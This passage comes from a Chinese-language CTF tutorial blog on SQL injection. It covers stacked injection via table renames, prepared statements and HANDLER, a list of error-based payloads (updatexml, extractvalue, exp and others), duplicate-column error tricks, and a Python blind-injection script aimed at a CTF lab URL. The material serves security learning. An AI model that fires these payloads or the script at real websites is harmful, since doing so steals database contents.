href=\"https:\/\/blog.csdn.net\/m0_62851980\/article\/details\/123942292\">BUUCTF-\u5f3a\u7f51\u676f2019\u968f\u4fbf\u6ce8 write up<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u6539\u76ee\u6807\u540d<\/h2>\n\n\n\n<p>\u8fd9\u9053\u9898select\u88ab\u8fc7\u6ee4\u4e86\uff0c\u610f\u5473\u7740\u8fd9\u9053\u9898\u65e0\u6cd5\u8054\u5408\uff08union\uff09\u6ce8\u5165\uff0c\u800c\u5b83\u7684\u5185\u90e8\u67e5\u8be2\u8bed\u53e5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select id,data from word where id =<\/code><\/pre>\n\n\n\n<p>\u7f51\u9875\u7684\u56de\u663e\u90fd\u662fwords\u8fd9\u4e2a\u8868\u7ed9\u7684\u56de\u663e\uff0c\u800c\u6211\u4eec\u7684flag\u653e\u5728\u6570\u5b57\u8868\u91cc\uff0c\u90a3\u4e48\u6211\u4eec\u9700\u8981\u8ba9\u6570\u5b57\u8868\u56de\u663e\u51fa\u6765flag\u4e86\uff0c\u8fd9\u65f6\u76f4\u63a5\u5806\u53e0\u6ce8\u5165\u53ea\u4f1a\u6709words\u8868\u7684\u56de\u663e\uff0c\u8fd9\u91cc\u7684\u89e3\u51b3\u529e\u6cd5\u4fbf\u662f\u628a\u6570\u5b57\u8868\u6539\u4e3awords\u8868\u540d\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1.\u5148\u5bf9words\u8fdb\u884c\u6539\u8868\u540d\u9632\u6b62\u91cd\u540d\uff1arename table `words` to `word`;\n2.\u5c06\u6570\u5b57\u8868\u6539\u4e3awords\u8868\u540d(\u5728\u7a97\u53e3\u56de\u663e\u5185\u5bb9)\uff1arename table `1919810931114514` to `words`;\n3.\u6211\u4eec\u67e5\u8868\u7ed3\u6784\u65f6\u770b\u5230words\u91cc\u6709\u4e24\u4e2a\u5b57\u6bb5id\u5217\u548c\u6570\u636edata,\u4f46\u6570\u5b57\u8868\u6ca1\u6709id\uff0c\u6240\u4ee5\u6211\u4eec\u628aflag\u6362\u6210id\uff1aalter table `words` change `flag` `id` varchar(100);<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u4fee\u6539flag\u4e3aid\u76f4\u63a5\u5806\u53e0\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1';rename table `words` to `word`;rename table `1919810931114514` to `words`;alter table `words` change `flag` `id` 
varchar(100);#<\/code><\/pre>\n\n\n\n<p>\u7136\u540e\u7528\u4e07\u80fd\u5bc6\u7801\u5373\u53ef\u663e\u793a\u51fa\u8868\u91cc\u7684\u6240\u6709\u6570\u636e\uff0c\u81ea\u7136\u4e5f\u5305\u62ecflag\u4e86\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9884\u5904\u7406<\/h2>\n\n\n\n<p>\u5f53\u7136\u9664\u4e86\u8fd9\u79cd\u65b9\u6cd5\u8fd8\u53ef\u4ee5\u4f7f\u7528<strong>\u9884\u5904\u7406<\/strong>\u89e3\u51b3\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1'; Set @a=concat(\"sele\",\"ct flag from `1919810931114514`\");prepare h from @a;execute h;<\/code><\/pre>\n\n\n\n<p>\u9884\u5904\u7406\u57fa\u4e8e\u4e09\u4e2aSQL\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>PREPARE stmt_name FROM preparable_stmt;\nEXECUTE stmt_name &#91;USING @var_name &#91;, @var_name] ...];\n{DEALLOCATE | DROP} PREPARE stmt_name;<\/code><\/pre>\n\n\n\n<p>PREPARE\u8bed\u53e5\u7528\u4e8e\u9884\u5907\u4e00\u4e2a\u8bed\u53e5\uff0c\u5e76\u8d4b\u4e88\u5b83\u540d\u79f0stmt_name\uff0c\u501f\u6b64\u5728\u4ee5\u540e\u5f15\u7528\u8be5\u8bed\u53e5\u3002\u8bed\u53e5\u540d\u79f0\u4e0d\u533a\u5206\u5927\u5c0f\u5199\u3002preparable_stmt\u53ef\u4ee5\u662f\u4e00\u4e2a\u6587\u5b57\u5b57\u7b26\u4e32\uff0c\u4e5f\u53ef\u4ee5\u662f\u4e00\u4e2a\u5305\u542b\u4e86\u8bed\u53e5\u6587\u672c\u7684\u7528\u6237\u53d8\u91cf\u3002\u8be5\u6587\u672c\u5fc5\u987b\u5c55\u73b0\u4e00\u4e2a\u5355\u4e00\u7684SQL\u8bed\u53e5\uff0c\u800c\u4e0d\u662f\u591a\u4e2a\u8bed\u53e5\u3002\u4f7f\u7528\u672c\u8bed\u53e5\uff0c\u2018?\u2019\u5b57\u7b26\u53ef\u4ee5\u7528\u4f5c\u53c2\u6570\u6807\u8bb0\uff0c\u4ee5\u6307\u793a\u5f53\u60a8\u6267\u884c\u67e5\u8be2\u65f6\uff0c\u6570\u636e\u503c\u5728\u54ea\u91cc\u4e0e\u67e5\u8be2\u7ed3\u5408\u5728\u4e00\u8d77\u3002\u2018?\u2019\u5b57\u7b26\u4e0d\u5e94\u52a0\u5f15\u53f7\uff0c\u5373\u4f7f\u60a8\u60f3\u8981\u628a\u5b83\u4eec\u4e0e\u5b57\u7b26\u4e32\u503c\u7ed3\u5408\u5728\u4e00\u8d77\uff0c\u4e5f\u4e0d\u8981\u52a0\u5f15\u53f7\u3002\u53c2\u6570\u6807\u8bb0\u53ea\u8
0fd\u88ab\u7528\u4e8e\u6570\u636e\u503c\u5e94\u8be5\u51fa\u73b0\u7684\u5730\u65b9\uff0c\u4e0d\u7528\u4e8eSQL\u5173\u952e\u8bcd\u548c\u6807\u8bc6\u7b26\u7b49\u3002<\/p>\n\n\n\n<p>\u5f53\u7136\u6211\u4eec\u53ea\u7528\u638c\u63e1\u5b83\u7684\u8fd0\u7528\u5373\u53ef\uff0c\u5373\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Set @a='\u8bed\u53e5';prepare h from @a;execute h;<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528handler\u51fd\u6570<\/h2>\n\n\n\n<p>\u4e0d\u8fc7\u8fd9\u4e2a\u9898\u8fd8\u53ef\u4ee5\u62d3\u5c55\u4e00\u4e0b\uff0c\u90a3\u5c31\u662f\u5982\u679c\u8fd9\u9053\u9898\u589e\u52a0\u4e86\u8fc7\u6ee4\uff08 select\uff0cset\uff0cprepare\uff0crename\uff09\u600e\u4e48\u529e\u5462\uff1f\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u5229\u7528handler\u51fd\u6570\uff0c\u4ed6\u53ef\u4ee5\u5728\u4e0d\u77e5\u9053\u5b57\u6bb5\u540d\u7684\u524d\u63d0\u4e0b\u67e5\u8be2\u51fa\u5b57\u6bb5\u7684\u503c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1';handler `1919810931114514` open as aaa;handler aaa read first;<\/code><\/pre>\n\n\n\n<p>\u5176\u4e2d\u7684aaa\u4e3a\u6211\u4eec\u81ea\u5df1\u5b9a\u4e49\u7684\u540d\u5b57\uff0cfirst\u4e3a\u8bfb\u7b2c\u4e00\u884c\u6570\u636e\uff0c\u4e0e\u4ed6\u5e76\u5217\u7684\u8fd8\u6709next\uff08\u8bfb\u53d6\u4e0b\u4e00\u884c)\u3002<\/p>\n\n\n\n<p>\u4f7f\u7528handler \u8bfb\u53d6\u6570\u636e \u8fd9\u4e2ahandler\u53ea\u80fd\u4e00\u884c\u4e00\u884c\u7684\u8bfb\u53d6\u4f7f\u7528read first\u3001next\u3001prev\u3001last\u7b49\u51fd\u6570\u53bb\u8bfb\u53d6\uff0c\u7528\u6cd5\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>1.\u6253\u5f00\u8868\nhandler table_name open\n2.\u8bfb\u53d6\u7b2c\u4e00\u884c\nhandler table_name read first\u6216\u8005(next)\n3.\u5173\u95ed\u8868\nhandler table_name close<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u5176\u5b9e\u5bf9\u4e8e\u8fd9\u9053\u9898\u4e5f\u53ef\u4ee5\u4e0d\u53d6\u522b\u540d\u76f4\u63a5\u4f7f\u7528\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>';handler `1919810931114514` 
open;handler `1919810931114514` read next;--+<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">\u62a5\u9519\u6ce8\u5165<\/h1>\n\n\n\n<p>\u901a\u8fc7<strong>\u7279\u6b8a\u51fd\u6570<\/strong>\u7684\u9519\u8bef\u4f7f\u7528\u4f7f\u5176\u53c2\u6570\u88ab\u9875\u9762\u8f93\u51fa\uff0c\u6709\u70b9\u50cfSSTI\u3002\u5f53\u7136\uff0c\u8fd9\u79cd\u6ce8\u5165\u53ef\u4ee5\u6210\u529f\u7684\u524d\u63d0\u662f\u670d\u52a1\u5668\u5f00\u542f\u62a5\u9519\u4fe1\u606f\u8fd4\u56de\uff0c\u4e5f\u5c31\u662f\u53d1\u751f\u9519\u8bef\u65f6\u8fd4\u56de\u62a5\u9519\u4fe1\u606f\uff0c\u5e38\u89c1\u7684\u5229\u7528\u51fd\u6570\u6709\u5e38\u89c1\u7684\u5229\u7528\u51fd\u6570\u6709\uff1a<code>exp()\u3001floor()+rand()\u3001updatexml()\u3001extractvalue()<\/code>\u7b49\uff0c\u53c2\u8003<a href=\"https:\/\/xz.aliyun.com\/t\/2869#toc-25\">SQL \u6ce8\u5165\u603b\u7ed3<\/a>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><strong>1.floor()\u548crand()<\/strong>\nunion select count(*),2,concat(':',(select database()),':',floor(rand()*2))as a from information_schema.tables group by a       \/*\u5229\u7528\u9519\u8bef\u4fe1\u606f\u5f97\u5230\u5f53\u524d\u6570\u636e\u5e93\u540d*\/\n<strong>2.extractvalue()<\/strong>\nid=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))\n<strong>3.updatexml()<\/strong>\nid=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))\n<strong>4.geometrycollection()<\/strong>\nid=1 and geometrycollection((select * from(select * from(select user())a)b))\n<strong>5.multipoint()<\/strong>\nid=1 and multipoint((select * from(select * from(select user())a)b))\n<strong>6.polygon()<\/strong>\nid=1 and polygon((select * from(select * from(select user())a)b))\n<strong>7.multipolygon()<\/strong>\nid=1 and multipolygon((select * from(select * from(select user())a)b))\n<strong>8.linestring()<\/strong>\nid=1 and linestring((select * from(select * from(select user())a)b)\n<strong>9.multilinestring()<\/strong>\nid=1 and multilinestring((select * from(select * from(select 
user())a)b))\n<strong>10.exp()<\/strong>\nid=1 and exp(~(select * from(select user())a))<\/code><\/pre>\n\n\n\n<p>\u5c06\u4e0a\u8ff0payload\u7684(select user())\u5f53\u505a\u8054\u5408\u67e5\u8be2\u6cd5\u7684\u6ce8\u5165\u4f4d\u7f6e\uff0c\u63a5\u4e0b\u6765\u7684\u64cd\u4f5c\u4e0e\u8054\u5408\u67e5\u8be2\u6cd5\u4e00\u6837\uff0c\u4e0d\u8fc7\u503c\u5f97\u6ce8\u610f\u7684\u662f\u62a5\u9519\u51fd\u6570\u901a\u5e38\u5c24\u5176\u6700\u957f\u62a5\u9519\u8f93\u51fa\u7684\u9650\u5236\uff0c\u9762\u5bf9\u8fd9\u79cd\u60c5\u51b5\uff0c\u53ef\u4ee5\u8fdb\u884c\u5206\u5272\u8f93\u51fa\uff0c\u6709\u65f6\u5019\u7279\u6b8a\u51fd\u6570\u7684\u7279\u6b8a\u53c2\u6570\u8fdb\u8fd0\u884c\u4e00\u4e2a\u5b57\u6bb5\u3001\u4e00\u884c\u6570\u636e\u7684\u8fd4\u56de\uff0c\u4f7f\u7528group_concat\u7b49\u51fd\u6570\u805a\u5408\u6570\u636e\u5373\u53ef\uff0c\u4ee5newstarctf\u7b2c\u4e8c\u5468\u7684Word-For-You(2 Gen)\u4e3a\u4f8b\uff0c\u8fd9\u91cc\u6211\u4eec\u4f7f\u7528updatexml()\u8fdb\u884c\u62a5\u9519\u6ce8\u5165\uff1a<\/p>\n\n\n\n<p><strong>\u7206\u5e93\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT database())),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u6570\u636e\u5e93wfy<\/p>\n\n\n\n<p><strong>\u7206\u8868\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u8868\u540d\uff1awfy_admin,wfy_comments,wfy_info<\/p>\n\n\n\n<p><strong>\u67e5\u770bwfy_comments\u8868\u5217\u540d\uff1a<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(column_name) from information_schema.columns where table_name='wfy_comments')),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f97\u5230\u5217\u540d\uff1aid,text,user,name,display<\/p>\n\n\n\n<p><strong>\u67e5\u6570\u636e<\/strong><\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat(0x7e,(sELECT group_concat(text) from wfy_comments)),1)--+<\/code><\/pre>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u6211\u4eec\u53ef\u4ee5\u5f97\u5230\u4e00\u90e8\u5206\u7684\u6570\u636e\uff0c\u4f46\u662f\u56e0\u4e3a\u62a5\u9519\u51fd\u6570\u9650\u5236\u957f\u5ea6\uff0c\u6211\u4eec\u53ea\u80fd\u4e00\u6b65\u4e00\u6b65\u7684\u622a\u53d6\u8f93\u51fa\uff0c\u6bd4\u5982\u4f7f\u7528substr()\u51fd\u6570\uff0c\u4f7f\u7528payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat('^',( select substr(group_concat(text),155,172) from wfy_comments),'^'),1)--+<\/code><\/pre>\n\n\n\n<p>\u5f53\u7136\u4e5f\u53ef\u4ee5\u4f7f\u7528limit\uff0c\u5229\u7528limit\u8fdb\u884c\u5206\u9875\uff0c\u4f5c\u7528\u662f\u5c55\u793a\u7b2c\u51e0\u6761\u6570\u636e\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?name=1'and updatexml(1,concat('^',( select text from wfy_comments limit 5,1),'^'),1)--+<\/code><\/pre>\n\n\n\n<p>\u4f46\u662f\u7f3a\u70b9\u662f\u6709\u7684\u662f\u957f\u5ea6\u6709\u9650\u5236\u7684\u8bdd\u8fd8\u662f\u663e\u793a\u4e0d\u51fa\u6765\uff0c\u6bd4\u5982\u8fd9\u4e2a\u9898\u4ed6\u5c31\u663e\u4e0d\u51fa\u6765flag\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">mysql\u5217\u540d\u91cd\u590d\u62a5\u9519<\/h2>\n\n\n\n<p>\u5185\u5bb9\u90fd\u6284\u7684S<a href=\"https:\/\/xz.aliyun.com\/t\/2869#toc-20\">QL\u6ce8\u5165\u6709\u8da3\u59ff\u52bf\u603b\u7ed3<\/a>\uff1a<\/p>\n\n\n\n<p>\u5728mysql\u4e2d\uff0cmysql\u5217\u540d\u91cd\u590d\u4f1a\u5bfc\u81f4\u62a5\u9519\uff0c\u800c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7name_const\u5236\u9020\u4e00\u4e2a\u5217.<br>Name_const\u51fd\u6570\u7528\u6cd5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; select name_const(version(),1);\n+--------+\n| 5.5.47 |\n+--------+\n|      1 |\n+--------+\n1 row in set (0.00 sec)<\/code><\/pre>\n\n\n\n<p>\u62a5\u9519\u7528\u6cd5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; select 
name_const(version(),1),name_const(version(),1);;\n+--------+--------+\n| 5.5.47 | 5.5.47 |\n+--------+--------+\n|      1 |      1 |\n+--------+--------+\n1 row in set (0.00 sec)\n\nERROR:\nNo query specified\n\nmysql&gt; select * from (select name_const(version(),1),name_const(version(),1))x;\nERROR 1060 (42S21): Duplicate column name '5.5.47'<\/code><\/pre>\n\n\n\n<p>\u4e0d\u8fc7\u8fd9\u4e2a\u6709\u5f88\u5927\u7684\u9650\u5236\uff0c<code>version()<\/code>\u6240\u5bf9\u5e94\u7684\u503c\u5fc5\u987b\u662f\u5e38\u91cf\uff0c\u800c\u6211\u4eec\u6240\u9700\u8981\u7684<code>database()<\/code>\u548c<code>user()<\/code>\u90fd\u662f\u53d8\u91cf\uff0c\u65e0\u6cd5\u901a\u8fc7\u62a5\u9519\u5f97\u51fa\uff0c\u4f46\u662f\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u539f\u7406\u914d\u5408join\u51fd\u6570\u5f97\u5230\u5217\u540d\u3002\u7528\u6cd5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>mysql&gt; select * from ctf_test a join ctf_test b;\n+------+--------------+------+--------------+\n| user | pwd          | user | pwd          |\n+------+--------------+------+--------------+\n| 1    | 0            | 1    | 0            |\n| 2    | flag{OK_t72} | 1    | 0            |\n| 1    | 0            | 2    | flag{OK_t72} |\n| 2    | flag{OK_t72} | 2    | flag{OK_t72} |\n+------+--------------+------+--------------+\n4 rows in set (0.00 sec)\n\nmysql&gt; select * from (select * from ctf_test a join ctf_test b )x;\nERROR 1060 (42S21): Duplicate column name 'user'\nmysql&gt; select * from (select * from ctf_test a join ctf_test b using(user))x;\nERROR 1060 (42S21): Duplicate column name 'pwd'\nmysql&gt; select * from (select * from ctf_test a join ctf_test b using(user,pwd))x;\n+------+--------------+\n| user | pwd          |\n+------+--------------+\n| 1    | 0            |\n| 2    | flag{OK_t72} |\n+------+--------------+\n2 rows in set (0.00 sec)<\/code><\/pre>\n\n\n\n<p>\u4eb2\u6d4b\u53ef\u884c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-12.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"691\" height=\"298\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-12.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1415\"  sizes=\"auto, (max-width: 691px) 100vw, 691px\" \/><\/div><\/figure>\n\n\n\n<p>\u7b80\u5355\u89e3\u91ca\u4e00\u4e0b\u8fd9\u53e5\u8bdd\u5565\u610f\u601d\uff0c\u8fd9\u662f\u4e00\u6761 SQL \u8bed\u53e5\uff0c\u5176\u4e3b\u8981\u4f5c\u7528\u662f\u5c06\u8868 <code>sheet1<\/code> \u4e2d\u6240\u6709\u7528\u6237\u540d\u548c\u5bc6\u7801\u76f8\u540c\u7684\u6570\u636e\u884c\u8fde\u63a5\u8d77\u6765\uff0c\u5e76\u8f93\u51fa\u6240\u6709\u7684\u5217\u4fe1\u606f\u3002\u8be5\u8bed\u53e5\u4e3b\u8981\u7531\u4ee5\u4e0b\u51e0\u90e8\u5206\u7ec4\u6210\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>select *<\/code>: \u8868\u793a\u9009\u53d6\u6240\u6709\u7684\u5217\u3002<\/li>\n\n\n\n<li><code>sheet1 a<\/code>: \u8868\u793a\u4ece\u8868 <code>sheet1<\/code> \u4e2d\u9009\u53d6\u6570\u636e\uff0c\u5e76\u4f7f\u7528\u522b\u540d <code>a<\/code> \u8868\u793a\u3002<\/li>\n\n\n\n<li><code>join<\/code>: \u8868\u793a\u8fde\u63a5\u64cd\u4f5c\u3002<\/li>\n\n\n\n<li><code>sheet1 b<\/code>: \u8868\u793a\u4ece\u8868 <code>sheet1<\/code> \u4e2d\u9009\u53d6\u6570\u636e\uff0c\u5e76\u4f7f\u7528\u522b\u540d <code>b<\/code> \u8868\u793a\u3002<\/li>\n\n\n\n<li><code>using(\u7528\u6237\u540d,\u5bc6\u7801)<\/code>: 
\u8868\u793a\u53ea\u8fde\u63a5 <code>sheet1<\/code> \u8868\u4e2d\u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\u5217\u3002<\/li>\n\n\n\n<li><code>select * from (...)x<\/code>: \u8868\u793a\u5c06\u4e0a\u8ff0\u8fde\u63a5\u3001\u7b5b\u9009\u540e\u7684\u7ed3\u679c\u4fdd\u5b58\u4e3a\u4e00\u4e2a\u4e34\u65f6\u8868 <code>x<\/code>\uff0c\u5e76\u8f93\u51fa\u8be5\u8868\u7684\u6240\u6709\u5217\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u8fd9\u6761 SQL \u8bed\u53e5\u7684\u5177\u4f53\u542b\u4e49\u662f\uff0c\u4ece\u8868 <code>sheet1<\/code> \u4e2d\u9009\u53d6\u7528\u6237\u540d\u548c\u5bc6\u7801\u76f8\u540c\u7684\u6570\u636e\u884c\uff0c\u5e76\u5c06\u5b83\u4eec\u7684\u5176\u4ed6\u5217\u4fe1\u606f\u8fdb\u884c\u5408\u5e76\uff0c\u6700\u7ec8\u8f93\u51fa\u6240\u6709\u5217\u4fe1\u606f\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u76f2\u6ce8<\/h1>\n\n\n\n<p>\u6838\u5fc3\uff1a\u5229\u7528<strong>\u903b\u8f91\u4ee3\u6570\u8fde\u63a5\u8bcd\/\u6761\u4ef6\u51fd\u6570<\/strong>\uff0c\u8ba9\u9875\u9762<strong>\u8fd4\u56de\u7684\u5185\u5bb9\/\u54cd\u5e94\u65f6\u95f4<\/strong>\u4e0e\u6b63\u5e38\u7684\u9875\u9762\u4e0d\u7b26\uff0c\u7136\u540e\u901a\u8fc7\u5b57\u7b26\u4e00\u4f4d\u4e00\u4f4d\u5339\u914d\u6240\u9700\u8981\u7684\u540d\u79f0\u3002<\/p>\n\n\n\n<p>\u5e38\u89c1\u7684\u51fd\u6570\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>length(str) \uff1a\u8fd4\u56de\u5b57\u7b26\u4e32str\u7684\u957f\u5ea6\nsubstr(str, pos, len) \uff1a\u5c06str\u4ecepos\u4f4d\u7f6e\u5f00\u59cb\u622a\u53d6len\u957f\u5ea6\u7684\u5b57\u7b26\u8fdb\u884c\u8fd4\u56de\u3002\u6ce8\u610f\u8fd9\u91cc\u7684pos\u4f4d\u7f6e\u662f\u4ece1\u5f00\u59cb\u7684\uff0c\u4e0d\u662f\u6570\u7ec4\u76840\u5f00\u59cb\nmid(str,pos,len) \uff1a\u8ddf\u4e0a\u9762\u7684\u4e00\u6837\uff0c\u622a\u53d6\u5b57\u7b26\u4e32\nascii(str) \uff1a\u8fd4\u56de\u5b57\u7b26\u4e32str\u7684\u6700\u5de6\u9762\u5b57\u7b26\u7684ASCII\u4ee3\u7801\u503c\nord(str) \uff1a\u5c06\u5b57\u7b26\u6216\u5e03\u5c14\u7c7b\u578b\u8f6c\u6210ascll\u7801\nif(a,b,c) 
\uff1aa\u4e3a\u6761\u4ef6\uff0ca\u4e3atrue\uff0c\u8fd4\u56deb\uff0c\u5426\u5219\u8fd4\u56dec\uff0c\u5982if(1&gt;2,1,0),\u8fd4\u56de0<\/code><\/pre>\n\n\n\n<p>\u5e38\u5e38\u5229\u7528<strong>and or ||<\/strong> <strong>&amp;&amp;<\/strong>\u4f5c\u4e3a\u62fc\u63a5\u6761\u4ef6\u7684\u8bed\u53e5\uff0c\u5982\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?id=-1 &amp;&amp; length( database() )&gt;1 --+\n?id<span class=\"token operator\">=1<\/span> <span class=\"token operator\">and<\/span> length<span class=\"token punctuation\">(<\/span> <span class=\"token keyword\">database()<\/span> <span class=\"token punctuation\">)&gt;1<\/span> <span class=\"token comment\">--+<\/span>\n?id<span class=\"token operator\">=-1<\/span> || length<span class=\"token punctuation\">(<\/span> <span class=\"token keyword\">database()<\/span> <span class=\"token punctuation\">)&gt;1<\/span> <span class=\"token comment\">--+<\/span>\n?id<span class=\"token operator\">=-1<\/span> or length<span class=\"token punctuation\">(<\/span> <span class=\"token keyword\">database()<\/span> <span class=\"token punctuation\">)&gt;1<\/span> <span class=\"token comment\">--+<\/span><\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u5e03\u5c14\u76f2\u6ce8<\/h2>\n\n\n\n<p>\u8fdb\u884c\u5e03\u5c14\u76f2\u6ce8\u7684\u6761\u4ef6\u662f\u9875\u9762\u4f1a\u6709\u56de\u663e\u4f5c\u4e3a\u8bed\u53e5\u6267\u884c\u662f\u5426\u6210\u529f\u7684\u6807\u5fd7\uff0c\u4e00\u822c\u6211\u4eec\u53ef\u4ee5\u5148\u7528\u6c38\u771f\u6761\u4ef6<code>or 1=1<\/code>\u4e0e\u6c38\u5047\u6761\u4ef6<code>and 1=2<\/code>\u7684\u8fd4\u56de\u5185\u5bb9\u662f\u5426\u5b58\u5728\u5dee\u5f02\u8fdb\u884c\u5224\u65ad\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u5e03\u5c14\u76f2\u6ce8\uff0c\u5177\u4f53\u8bed\u53e5\u4e0e\u8054\u5408\u6ce8\u5165\u7c7b\u4f3c\uff0c\u4ee5newstarctf week4\u7684\u53c8\u4e00\u4e2aSQL\u4e3a\u4f8b\uff0c\u811a\u672c\u53c2\u8003<a 
href=\"https:\/\/forum.butian.net\/share\/1961\">NewStarCTF-Week3&amp;4\u7684WEB\u9898\u76ee\u8be6\u89e3<\/a>\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\nimport string\nimport time\natt=string.digits+string.ascii_letters+'}{-$_.^,'\n# print(att)\n\nflag=''\n\nurl='http:\/\/eedea255-193b-45f8-b87f-de7ee7324fa8.node4.buuoj.cn:81\/comments.php?name='\nfor i in range(1,50):\n    for a in att:\n        # payload='0\/***\/or\/***\/(substr(database(),{},1)=\"{}\")'.format(i,a)\n        # payload='0\/***\/or\/***\/(substr((select\/***\/group_concat(table_name)\/***\/from\/***\/information_schema.tables\/***\/where\/***\/table_schema=database()),{},1)=\"{}\")'.format(i,a)\n        # payload='0\/***\/or\/***\/(substr((select\/***\/group_concat(column_name)\/***\/from\/***\/information_schema.columns\/***\/where\/***\/table_schema=database()\/***\/and\/***\/table_name=\"wfy_admin\"),{},1)=\"{}\")'.format(i,a)\n        # payload='0\/***\/or\/***\/(substr((select\/***\/group_concat(column_name)\/***\/from\/***\/information_schema.columns\/***\/where\/***\/table_schema=database()\/***\/and\/***\/table_name=\"wfy_comments\"),{},1)=\"{}\")'.format(i,a)\n        payload='0\/***\/or\/***\/(substr((select\/***\/text\/***\/from\/***\/`wfy_comments`\/***\/where\/***\/id=100),{},1)\/***\/like\/***\/binary\/***\/\"{}\")'.format(i,a)\n        res=requests.get(url=url+payload)\n        time.sleep(0.1)\n        if \"\u597d\u8036\uff01\u4f60\u6709\u8fd9\u6761\u6765\u81ea\u6761\u7559\u8a00\" in res.text:\n            flag+=a\n            print(flag)\n            
break\n\nprint(flag)\n#wfy\n#wfy_admin,wfy_comments,wfy_information\n#wfy_admin:id,username,password,cookie\n#wfy_comments:id,text,user,name,display\n#flag{We_0nly_have_2wo_choices}<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u4f7f\u7528\/**\/\u4ee3\u66ff\u7a7a\u683c\uff0c\u524d\u9762\u7684\u8bed\u53e5\u90fd\u548c\u4e4b\u524dunion\u6ce8\u5165\u5dee\u4e0d\u591a\uff0c\u53ea\u6709\u6700\u540e\u4e00\u53e5\u7a0d\u6709\u4e0d\u540c\uff0c\u6211\u4eec\u4f7f\u7528\u7684\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>0\/***\/or\/***\/(substr((select\/***\/text\/***\/from\/***\/`wfy_comments`\/***\/where\/***\/id=100),{},1)\/***\/like\/***\/binary\/***\/\"{}\")<\/code><\/pre>\n\n\n\n<p>\u5373<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>0 or (substr((select text from `wfy_comments ` where id=100),{},1) like binary \"{}\")<\/code><\/pre>\n\n\n\n<p>\u901a\u8fc7substr\u4e00\u4f4d\u4e00\u4f4d\u622a\u53d6(select text from `wfy_comments ` where id=100)\u7684\u503c\uff0c\u901a\u8fc7like binary\u5339\u914d\u5b57\u7b26\uff0cbinary 